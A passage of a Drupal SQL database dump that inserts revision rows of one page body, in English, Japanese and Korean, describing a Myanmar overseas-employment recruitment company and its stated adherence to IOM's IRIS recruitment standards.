Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">생산하도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 197, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards of ASEAN standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.&nbsp;</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).&nbsp;</p>', '', 'full_html'),
('page', 0, 26, 197, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>会社の目標</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し、アジアのスタンダード、国際スタンダードに負けない会社になることに目指しております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">会社と労働者の間に損失がないように</span>International Organization for Migration (IOM)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">が定めた</span>International Recruitment Integrity System(IRIS)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">に合った基準で管理しております。</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 197, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>회사의</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>미래</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>비전</strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우리</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위대한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">현재</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상황과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라 외국에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싶은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미래의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">훈련과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"mso-fareast-language:KO;\">ASEAN&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">표준</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부합하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">만들기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되었습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용주와</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사이에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">피해가</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제이주기구</span><span style=\"mso-fareast-language:KO;\">(IOM)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제정한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제채용청렴제도</span><span style=\"mso-fareast-language:KO;\">(IRIS)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">선발하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">생산하도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 198, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards of ASEAN standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.&nbsp;</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).&nbsp;</p>', '', 'full_html'),
('page', 0, 26, 198, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>会社の目標</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し、アジアのスタンダード、国際スタンダードに負けない会社になることに目指しております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">会社と労働者の間に損失がないように</span>International Organization for Migration (IOM)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">が定めた</span>International Recruitment Integrity System(IRIS)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">に合った基準で管理しております。</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 198, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>회사의</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>미래</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>비전</strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우리</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위대한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">현재</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상황과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라 외국에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싶은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미래의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">훈련과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"mso-fareast-language:KO;\">ASEAN&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">표준</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부합하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">만들기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되었습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용주와</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사이에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">피해가</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제이주기구</span><span style=\"mso-fareast-language:KO;\">(IOM)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제정한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제채용청렴제도</span><span style=\"mso-fareast-language:KO;\">(IRIS)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">선발하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">생산하도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 203, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards of ASEAN standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.&nbsp;</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).&nbsp;</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 26, 203, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>会社の目標</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し、アジアのスタンダード、国際スタンダードに負けない会社になることに目指しております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">会社と労働者の間に損失がないように</span>International Organization for Migration (IOM)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">が定めた</span>International Recruitment Integrity System(IRIS)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">に合った基準で管理しております。</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 203, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>회사의</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>미래</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>비전</strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun 